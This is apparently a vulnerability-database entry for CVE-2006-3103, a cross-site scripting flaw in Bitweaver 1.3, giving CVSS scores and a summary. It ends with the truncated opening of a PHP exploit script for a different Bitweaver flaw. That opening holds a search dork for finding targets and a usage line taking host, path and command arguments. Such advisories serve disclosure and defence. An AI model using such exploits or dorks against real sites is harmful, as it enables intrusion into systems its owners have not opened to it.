4.3
CVSSv2

CVE-2006-3103

Published: 21/06/2006 Updated: 18/10/2018
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

Cross-site scripting (XSS) vulnerability in Bitweaver 1.3 allows remote malicious users to inject arbitrary web script or HTML via the (1) error parameter in users/login.php and the (2) feedback parameter in articles/index.php.

Vulnerable Product Search on Vulmon Subscribe to Product

bitweaver bitweaver 1.3

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "bitweaver <= v13 'tmpImagePath' attachment mod_mime exploit\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n"; echo "dork: \"powered by bitweaver\"\r\n\r\n"; if ($argc<4) { echo "Usage: php "$argv[0]" host path cmd OPTIONS\r\n"; echo "host: ...